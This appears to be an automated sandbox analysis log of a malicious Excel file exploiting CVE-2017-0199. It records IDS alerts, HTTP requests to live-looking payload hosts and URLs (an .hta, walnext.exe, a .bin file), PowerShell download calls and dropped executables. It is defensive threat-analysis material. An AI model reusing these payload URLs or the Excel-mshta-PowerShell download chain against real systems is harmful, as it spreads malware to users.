        Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 107.175.113.214:80
        Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 107.175.113.214:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficHTTP traffic detected: GET /L44VBp?&waterspout=toothsome&washbasin=berserk&beer=unable&attorney=magical&friction=reminiscent&stumbling=needless&vertigo HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qrisni.meConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /L44VBp?&waterspout=toothsome&washbasin=berserk&beer=unable&attorney=magical&friction=reminiscent&stumbling=needless&vertigo HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qrisni.meConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /pkeZmGiUuTK20.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.bookinginfo.asiaCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.175.113.214Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 107.175.113.214If-Range: "20c63-62581d920ba93"
        Source: global trafficHTTP traffic detected: GET /902/walnext.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.175.113.214Connection: Keep-Alive
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899A4B18 URLDownloadToFileW,5_2_000007FE899A4B18
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B39DCB1F.emfJump to behavior
        Source: global trafficHTTP traffic detected: GET /L44VBp?&waterspout=toothsome&washbasin=berserk&beer=unable&attorney=magical&friction=reminiscent&stumbling=needless&vertigo HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qrisni.meConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /L44VBp?&waterspout=toothsome&washbasin=berserk&beer=unable&attorney=magical&friction=reminiscent&stumbling=needless&vertigo HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qrisni.meConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /pkeZmGiUuTK20.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.bookinginfo.asiaCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.175.113.214Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 107.175.113.214If-Range: "20c63-62581d920ba93"
        Source: global trafficHTTP traffic detected: GET /902/walnext.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.175.113.214Connection: Keep-Alive
        Source: mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
        Source: global trafficDNS traffic detected: DNS query: qrisni.me
        Source: global trafficDNS traffic detected: DNS query: www.bookinginfo.asia
        Source: mshta.exe, 00000004.00000002.424201847.000000000371E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.000000000371E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.000000000371E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.175.113.214/
        Source: powershell.exe, 00000005.00000002.444388800.0000000003546000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.175.113.214/902/walne
        Source: powershell.exe, 00000005.00000002.444388800.0000000003546000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.175.113.214/902/walnext.exe
        Source: powershell.exe, 00000005.00000002.452781154.000000001A64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.175.113.214/902/walnext.exe9
        Source: powershell.exe, 00000005.00000002.452781154.000000001A64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.175.113.214/902/walnext.exed-
        Source: powershell.exe, 00000005.00000002.444388800.0000000003546000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.175.113.214/902/walnext.exep
        Source: mshta.exe, 00000004.00000002.424201847.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.000000000371E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414660561.000000000297D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424194140.00000000036CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.000000000371E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.000000000371E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414676403.000000000297E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.00000000036CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta
        Source: mshta.exe, 00000004.00000003.412834526.0000000000586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta&fric3
        Source: mshta.exe, 00000004.00000003.412834526.0000000000586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta...ictio
        Source: mshta.exe, 00000004.00000003.414513596.0000000002975000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417771297.0000000002975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.htahttp://1
        Source: mshta.exe, 00000004.00000002.424194140.00000000036CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.00000000036CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.htapt-C:
        Source: mshta.exe, 00000004.00000002.424201847.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: mshta.exe, 00000004.00000002.424201847.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
        Source: mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
        Source: mshta.exe, 00000004.00000002.424201847.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
        Source: mshta.exe, 00000004.00000002.424201847.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
        Source: mshta.exe, 00000004.00000002.424201847.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
        Source: powershell.exe, 00000005.00000002.444388800.000000000327C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
        Source: wlanext.exe, wlanext.exe, 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, wlanext.exe, 0000000B.00000000.437723314.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, wlanext.exe.5.dr, walnext[1].exe.5.dr, wlanext.exe.12.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: wlanext.exe, 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, wlanext.exe, 0000000B.00000000.437723314.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, wlanext.exe.5.dr, walnext[1].exe.5.dr, wlanext.exe.12.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: powershell.exe, 00000005.00000002.444388800.000000000220C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.452302002.0000000012031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: mshta.exe, 00000004.00000002.424201847.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
        Source: mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
        Source: mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
        Source: mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
        Source: mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
        Source: mshta.exe, 00000004.00000002.424201847.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
        Source: mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
        Source: powershell.exe, 00000005.00000002.444388800.0000000002001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
        Source: mshta.exe, 00000004.00000002.424201847.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
        Source: powershell.exe, 00000005.00000002.452302002.0000000012031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000005.00000002.452302002.0000000012031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000005.00000002.452302002.0000000012031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000005.00000002.444388800.000000000220C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.452302002.0000000012031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: mshta.exe, 00000004.00000002.424201847.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424187501.00000000036C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qrisni.me/
        Source: mshta.exe, 00000004.00000002.424187501.00000000036C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qrisni.me/L
        Source: mshta.exe, 00000004.00000003.412834526.0000000000586000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsx, C0230000.0.drString found in binary or memory: https://qrisni.me/L44VBp?&waterspout=toothsome&washbasin=berserk&beer=unable&attorney=magical&fricti
        Source: mshta.exe, 00000004.00000002.424201847.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
        Source: msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/
        Source: msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/9
        Source: msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626563594.0000000005ED0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/pkeZmGiUuTK20.bin
        Source: msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/pkeZmGiUuTK20.binr
        Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
        Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
        Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.217.106.226:443 -> 192.168.2.22:49168 version: TLS 1.2
        Source: C:\Users\user\AppData\Roaming\wlanext.exeCode function: 11_2_00405205 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,11_2_00405205
        Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

        System Summary

        barindex
        Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsxOLE: Microsoft Excel 2007+
        Source: C0230000.0.drOLE: Microsoft Excel 2007+
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\niceworkingthingswithgreatthingsevengetbackwithgoodnews[1].htaJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\wlanext.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\walnext[1].exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\wlanext.exeJump to dropped file
